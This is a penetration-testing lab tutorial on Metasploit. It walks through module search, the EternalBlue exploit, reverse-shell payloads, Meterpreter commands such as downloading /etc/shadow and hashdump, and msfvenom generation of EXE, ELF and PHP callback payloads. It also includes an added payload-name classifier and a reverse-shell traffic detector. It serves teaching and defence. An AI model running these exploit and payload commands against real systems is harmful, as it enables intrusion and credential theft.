๐ฏ Lab Objectives
- Navigate the msfconsole interface and understand the module structure
- Search for, select, and configure exploit modules
- Understand the difference between staged and stageless payloads
- Gain a Meterpreter shell and navigate it effectively
- Perform basic post-exploitation: system info, privilege check, file access
- Generate standalone payloads with MSFvenom
What is Metasploit?
The Metasploit Framework is the world's most widely used penetration testing platform, developed by Rapid7. It contains hundreds of pre-built exploits, payloads, encoders, and post-exploitation modules, letting you go from vulnerability to shell quickly and reliably.
Key components:
- Exploits: Code that takes advantage of a vulnerability
- Payloads: Code that runs on the target after exploitation (e.g. a shell)
- Auxiliaries: Scanners, fuzzers, and other support modules
- Post modules: Post-exploitation: credential dumping, pivoting, persistence
- Encoders: Obfuscate payloads to evade AV detection
Step 1: Starting msfconsole
Launch and initialise Metasploit
```
# Start the PostgreSQL database (Metasploit uses it to store data)
sudo systemctl start postgresql
# Initialise the database on first run
sudo msfdb init
# Launch the console
sudo msfconsole
# Verify database connection
msf6 > db_status
Connected to msf. Connection type: postgresql.
# Check version
msf6 > version
```
Step 2: Searching for Modules
Find the right exploit or module
```
# Search by keyword
msf6 > search eternalblue
msf6 > search type:exploit platform:linux apache
# Search by CVE number
msf6 > search cve:2021-44228
# Search by service
msf6 > search name:smb type:exploit
# List all auxiliary scanners for a service
msf6 > search type:auxiliary name:ssh
```
The search results show a Rank column. Ranks from best to worst: excellent, great, good, normal, average, low, manual. Always prefer excellent or great ranked modules.
Step 3: Using an Exploit Module
Select a module and examine its options
```
# Use a module (by number from search results or full path)
msf6 > use exploit/multi/handler
msf6 > use 0 # use first result from last search
# Example: MS17-010 EternalBlue (SMB exploit)
msf6 > use exploit/windows/smb/ms17_010_eternalblue
# Show all required and optional options
msf6 exploit(ms17_010_eternalblue) > show options
# Get detailed info about the module
msf6 exploit(ms17_010_eternalblue) > info
```
Step 4: Understanding Payloads
A payload is what runs on the target machine after the exploit succeeds. The two main types are:
- Staged (windows/x64/meterpreter/reverse_tcp): Small stager connects back, then downloads the full payload. Smaller size, needs two connections.
- Stageless (windows/x64/meterpreter_reverse_tcp): Full payload in one. Larger but self-contained. Better for unstable networks.
```
# List payloads compatible with current exploit
msf6 exploit(ms17_010_eternalblue) > show payloads
# Common payloads
# Windows reverse Meterpreter (staged)
set PAYLOAD windows/x64/meterpreter/reverse_tcp
# Linux reverse shell (staged)
set PAYLOAD linux/x86/meterpreter/reverse_tcp
# Simple bash reverse shell
set PAYLOAD cmd/unix/reverse_bash
```
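As an added example (not from the original page or from Metasploit itself), this Python function applies the naming convention described above: a slash between the stage and the connection type marks a staged payload, an underscore joining them marks a stageless one, and names such as cmd/unix/reverse_bash are self-contained singles. The STAGES tuple is an assumption drawn from the names on this page, not Metasploit's full list.

```python
import re

# Stage names seen in this page's payload paths, plus "shell"; assumed, not a
# complete list of Metasploit's stages.
STAGES = ("meterpreter", "shell", "vncinject")
CONNECTIONS = ("reverse", "bind")
_STAGELESS = re.compile(r"^(%s)_(%s)_(.+)$" % ("|".join(STAGES), "|".join(CONNECTIONS)))

def classify_payload(name: str) -> dict:
    """Describe a Metasploit payload name by its path convention.

    staged:    .../<stage>/<reverse|bind>_<transport>   e.g. meterpreter/reverse_tcp
    stageless: .../<stage>_<reverse|bind>_<transport>   e.g. meterpreter_reverse_tcp
    single:    everything else, a self-contained payload e.g. cmd/unix/reverse_bash
    """
    parts = name.strip().split("/")
    if len(parts) < 2:
        raise ValueError(f"not a payload path: {name!r}")
    platform, last = parts[0], parts[-1]
    conn, _, transport = last.partition("_")
    # Staged: the stage is its own path element, followed by the stager name.
    if len(parts) >= 3 and parts[-2] in STAGES and conn in CONNECTIONS:
        return {"kind": "staged", "platform": platform, "stage": parts[-2],
                "connection": conn, "transport": transport}
    # Stageless: stage and stager are fused into one final element.
    m = _STAGELESS.match(last)
    if m:
        return {"kind": "stageless", "platform": platform, "stage": m.group(1),
                "connection": m.group(2), "transport": m.group(3)}
    # Single: no separate stage at all (e.g. a bash or python one-liner).
    return {"kind": "single", "platform": platform, "stage": None,
            "connection": conn if conn in CONNECTIONS else None,
            "transport": transport or None}

def kind(name: str) -> str:
    """Shortcut returning only 'staged', 'stageless' or 'single'."""
    return classify_payload(name)["kind"]
```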
Step 5: Setting Options
Configure RHOST, LHOST, LPORT and other required options
```
# Set target host
set RHOSTS 10.10.10.1
set RHOSTS 192.168.1.0/24 # entire subnet
# Set your attack machine IP (for reverse shells)
set LHOST 10.10.14.5
set LHOST tun0 # use VPN interface name directly
# Set listening port
set LPORT 4444
# Verify all options are set correctly
show options
# Check if target appears vulnerable
check
```
Step 6: Running the Exploit
Launch the exploit and catch a shell
```
# Run the exploit
run
# or:
exploit
# Run as a background job
exploit -j
# List background jobs
jobs
# List active sessions
sessions -l
# Interact with session 1
sessions -i 1
```
Step 7: Meterpreter Basics
Meterpreter is Metasploit's advanced payload that runs entirely in memory, making it hard to detect. It gives you a rich set of commands to interact with the target.
Essential Meterpreter commands
```
# System information
meterpreter > sysinfo
meterpreter > getuid # current user
meterpreter > getpid # process ID
# File system navigation
meterpreter > pwd
meterpreter > ls
meterpreter > cd /tmp
meterpreter > cat /etc/passwd
# Download / upload files
meterpreter > download /etc/shadow /tmp/shadow
meterpreter > upload /tmp/payload.sh /tmp/
# Drop into a system shell
meterpreter > shell
# Background the session
meterpreter > background
# Screenshot (Windows targets)
meterpreter > screenshot
```
Step 8: Post-Exploitation Modules
Use post modules on an active session
```
# From msfconsole with active session in background
# Dump password hashes (Windows)
use post/windows/gather/hashdump
set SESSION 1
run
# Enumerate installed applications
use post/windows/gather/enum_applications
set SESSION 1
run
# Linux: gather configuration files (including SSH config)
use post/linux/gather/enum_configs
set SESSION 1
run
# Privilege escalation suggestions
use post/multi/recon/local_exploit_suggester
set SESSION 1
run
```
Step 9: MSFvenom Payload Generation
MSFvenom is a standalone tool for generating payloads outside of msfconsole. Use it when you need a file to deliver to a target rather than using Metasploit directly.
```
# List all payload formats
msfvenom --list formats
# Windows reverse Meterpreter EXE
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=10.10.14.5 LPORT=4444 \
-f exe -o payload.exe
# Linux ELF reverse shell
msfvenom -p linux/x64/meterpreter/reverse_tcp \
LHOST=10.10.14.5 LPORT=4444 \
-f elf -o payload.elf
# PHP web shell
msfvenom -p php/meterpreter/reverse_tcp \
LHOST=10.10.14.5 LPORT=4444 \
-f raw -o shell.php
# Python one-liner
msfvenom -p cmd/unix/reverse_python \
LHOST=10.10.14.5 LPORT=4444 -f raw
# Start a listener to catch the payload
msf6 > use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.14.5
set LPORT 4444
run
```
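Seen from the network, the reverse_tcp callback the handler above waits for is an outbound connection from the compromised host to LHOST:LPORT, and for a staged payload the handler then pushes the whole stage down that connection. As an added example (not from the page or from Metasploit), this Python script scores constructed Zeek-style conn records with three heuristics a defender can start from: the page's default LPORT 4444, a small-request/large-response shape consistent with a stage download, and a long-lived session to a port outside an assumed allow-list. The allow-list, thresholds and log records are all assumptions.

```python
# Default LPORT used throughout this page's handler examples.
DEFAULT_HANDLER_PORTS = {4444}
# Assumed allow-list of ports where long-lived outbound sessions are routine.
EXPECTED_PORTS = {22, 25, 53, 80, 443, 993}
STAGE_BYTES_THRESHOLD = 100_000  # assumption: a Meterpreter stage is far larger
LONG_SESSION_SECONDS = 600       # assumption: interactive shells stay open long

# Constructed Zeek-style conn records (tab-separated, not captured traffic):
# ts  src  dst  dport  proto  duration  orig_bytes  resp_bytes
SAMPLE_CONN_LOG = """\
1700000000.1\t10.10.10.1\t10.10.14.5\t4444\ttcp\t3600.2\t2048\t1200000
1700000001.5\t10.10.10.1\t142.250.74.36\t443\ttcp\t12.0\t5000\t80000
1700000002.0\t10.10.10.7\t10.10.14.5\t8443\ttcp\t2400.0\t900\t750000
1700000003.3\t10.10.10.9\t10.10.10.2\t445\ttcp\t5.0\t3000\t3000
"""
FIELDS = ("ts", "src", "dst", "dport", "proto", "duration", "orig_bytes", "resp_bytes")
CASTS = (float, str, str, int, str, float, int, int)

def parse_conn_log(text: str) -> list:
    """Parse tab-separated conn records into dicts keyed by FIELDS."""
    rows = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        cols = line.split("\t")
        rows.append({k: cast(v) for k, cast, v in zip(FIELDS, CASTS, cols)})
    return rows

def reasons(c: dict) -> list:
    """Heuristics that make one flow look like a reverse_tcp callback."""
    r = []
    if c["dport"] in DEFAULT_HANDLER_PORTS:
        r.append("default-handler-port")
    unusual = c["dport"] not in EXPECTED_PORTS
    # Staged shape: the victim sends little, the handler pushes the whole stage.
    if unusual and c["orig_bytes"] < 10_000 and c["resp_bytes"] >= STAGE_BYTES_THRESHOLD:
        r.append("stage-download-shape")
    if unusual and c["duration"] >= LONG_SESSION_SECONDS:
        r.append("long-lived-unusual-port")
    return r

def find_callbacks(text: str) -> dict:
    """Map 'src->dst:dport' to its reasons; flows with no reasons are omitted."""
    out = {}
    for c in parse_conn_log(text):
        why = reasons(c)
        if why:
            out[f"{c['src']}->{c['dst']}:{c['dport']}"] = why
    return out
```

Changing LPORT to 443 defeats the first heuristic but not the other two, which is why the shape and duration checks matter more than the port.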
Metasploit Cheat Sheet
| Command | Description |
|---|---|
| search <term> | Search modules by keyword/CVE |
| use <module> | Select a module |
| info | Show module details |
| show options | Show required/optional settings |
| show payloads | Compatible payloads |
| set <OPT> <val> | Set an option |
| check | Test if target is vulnerable |
| run / exploit | Execute the module |
| sessions -l | List active sessions |
| sessions -i 1 | Interact with session 1 |
| background | Background current session |
| getuid | Show current user (Meterpreter) |
| getsystem | Attempt privilege escalation |
| hashdump | Dump Windows password hashes |
| shell | Drop to OS shell |
| download / upload | Transfer files |